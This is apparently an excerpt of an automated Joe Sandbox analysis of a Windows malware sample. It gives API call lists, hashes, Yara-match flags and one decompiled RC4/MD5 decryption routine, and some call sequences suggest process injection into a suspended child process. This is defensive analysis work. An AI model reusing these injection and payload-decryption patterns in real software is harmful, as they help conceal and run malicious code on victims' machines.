                                                                                                                                                                                                                                                                                          0x0010d338
                                                                                                                                                                                                                                                                                          0x0010d338
                                                                                                                                                                                                                                                                                          0x0010d328
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001091AA,?,?,00000000,00000000,00000000,?,0010751F,00000001,00000214,?,?), ref: 0010D355
                                                                                                                                                                                                                                                                                            • Part of subcall function 00107A0D: __getptd_noexit.LIBCMT ref: 00107A0D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 328603210-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2db4c3232968d91fb3ac6160eb4dd8ae4f8fa28a866d8a1b3e03fec2b39290e8
                                                                                                                                                                                                                                                                                          • Instruction ID: 4701cc0615fa507f5c318e8ea5a892972e3f3cb2fa05fdf794260e31dd89a1c5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2db4c3232968d91fb3ac6160eb4dd8ae4f8fa28a866d8a1b3e03fec2b39290e8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A601D4753013169BEB299FA5EC04B6A3354BF80360F048929F895CF1E0CBF4D840CA91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8e2b837b180aa29e562cc2c298d5c9536c11e9e781ba631660b69be911e5965f
                                                                                                                                                                                                                                                                                          • Instruction ID: dc4c2f9ddacd479831fbba26ff62489d643d253844178a8d4350fbc4ed0966b5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e2b837b180aa29e562cc2c298d5c9536c11e9e781ba631660b69be911e5965f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD09E74D0521CFBCB20DEA4D95465DBBF8EB09251F104999ED0D97200D6359A509694
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000,0010CC32,00171040,00000314,00000000,?,?,?,?,?,00108858,00171040,Microsoft Visual C++ Runtime Library,00012010), ref: 001073BF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2faf4aa64fd5a8b3be8c36ab50e92e0dffa370a9232e5afcc3d22983529499dc
                                                                                                                                                                                                                                                                                          • Instruction ID: 5d737d5d86990bd002681323dfe6405674d49093cc4b9d0ad41799c08bd70c46
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2faf4aa64fd5a8b3be8c36ab50e92e0dffa370a9232e5afcc3d22983529499dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,02551A51,00003000,00000004,000000BE,?,02551A51,?), ref: 02551A01
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4bf0dd4360b9e04fd5bd1029caf6245cbb01552cfcca4bb498ffaa200d93b119
                                                                                                                                                                                                                                                                                          • Instruction ID: 9e7c8b3041dadf015c33f08f5f61bed27235372d8c4ad67ed31d2a35ac4d12c8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf0dd4360b9e04fd5bd1029caf6245cbb01552cfcca4bb498ffaa200d93b119
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4D0C9B4A85308BBE710CE84DC16F69BBACDB04651F004185FE089B280D5B1AE1056A5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 0255182F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a7b5f543efedf1ff8f3c30db3d230dadb56ca17341b4ba861da72e47aca3ca69
                                                                                                                                                                                                                                                                                          • Instruction ID: 7d7af6128d9ed899e68af9cb8a59dafd5f0d7c309a42ef81ec6a6f737a2383fc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7b5f543efedf1ff8f3c30db3d230dadb56ca17341b4ba861da72e47aca3ca69
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30C04C7655430CBBCB04DFD8E894DAB37ADBB8C650B048548BA1D87200C630F9109BA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(0400C368,?,00000104), ref: 0252389B
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400C374), ref: 025238AD
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400C38C), ref: 025238C5
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 025238D6
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0252394E
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02523987
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0252399C
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 025239C5
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 025239EE
                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 02523A0C
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02523A19
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02523A26
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02523A37
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 1819736980-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 83596fe12a2dfdaf4c14bff8d9e8bcfb4be811be883a4a0e4667b25d06c46fb5
                                                                                                                                                                                                                                                                                          • Instruction ID: 130291717095ac1ccae3f3d1985ef522cb7fed383ed3eca8c1b79e5d33b8fefb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83596fe12a2dfdaf4c14bff8d9e8bcfb4be811be883a4a0e4667b25d06c46fb5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39D10071A44219ABDB28DF54CC94FAA7779FB48704F0486E8F609A72C0D7789AC4CF58
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                          			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                                          				long** _t35;
                                                                                                                                                                                                                                                                                          				char* _t52;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t31 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                          						_t32 = GetLastError();
                                                                                                                                                                                                                                                                                          						_v16 = _t32;
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t52 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                          						if(_t32 != 0) {
                                                                                                                                                                                                                                                                                          							_t34 = _a16;
                                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                                          							if(_t34 != 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								_t35 =  &_v24;
                                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                                          								if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04008cf6
                                                                                                                                                                                                                                                                                          0x04008d01
                                                                                                                                                                                                                                                                                          0x04008e1a
                                                                                                                                                                                                                                                                                          0x04008e20
                                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                                          0x04008d35
                                                                                                                                                                                                                                                                                          0x04008d3f
                                                                                                                                                                                                                                                                                          0x04008d47
                                                                                                                                                                                                                                                                                          0x04008d49
                                                                                                                                                                                                                                                                                          0x04008d4f
                                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                                          0x04008d6d
                                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                                          0x04008d82
                                                                                                                                                                                                                                                                                          0x04008d99
                                                                                                                                                                                                                                                                                          0x04008da1
                                                                                                                                                                                                                                                                                          0x04008da5
                                                                                                                                                                                                                                                                                          0x04008db1
                                                                                                                                                                                                                                                                                          0x04008db9
                                                                                                                                                                                                                                                                                          0x04008dbb
                                                                                                                                                                                                                                                                                          0x04008dc2
                                                                                                                                                                                                                                                                                          0x04008dd5
                                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                                          0x04008df7
                                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008d82

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008D49
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                          • Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C708,00000001,00000000), ref: 0252A002
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0252A00C
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C738,00000001,00000008), ref: 0252A03B
                                                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 0252A076
                                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 0252A096
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 0252A0D3
                                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0252A0F1
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0252A0FE
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0252A111
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0252A11D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3052018297-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                          • Instruction ID: feeaaea3997a0add3b25587dec975e710f87ff7dbbcd07a767ca0c12ed31a8dd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B411D75A00219EBEB14CF94C849FEF7BB8FB48705F148518FA11A61C0D7B9A988CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C888,00000001,00000000), ref: 0252A506
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0252A510
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C8B8,00000001,00000008), ref: 0252A53F
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0252A560
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0252A578
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0252A59C
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0252A5B8
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0252A5C5
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 0252A5CF
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0252A5DB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3718126946-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                          • Instruction ID: dac7aef572434a5d01282a86e549fd02e7300ef86b01feafb2547b6291777a3d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69310F75A44209AFEF28CFA4C849BAF7B79FB44705F148518F601B61C0D7B8AD88CB54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C828,00000001,00000000), ref: 0252A3C6
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0252A3D0
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C858,00000001,00000008), ref: 0252A3FF
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0252A420
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0252A438
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 0252A460
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0252A488
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 0252A49C
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0252A4A8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 731959895-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                          • Instruction ID: 5ee091dcaf4c5c602354538443aa46b4b3d2c2dc438103f35f9aba14271b5f3d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3410B75A40219ABEB18CF94C889BEF7BB8FB45705F148518FA11B61C0D7B8D984CFA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C7C8,00000001,00000000), ref: 0252A29A
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0252A2A4
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C7F8,00000001,00000008), ref: 0252A2D3
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 0252A2FE
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 0252A325
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0252A341
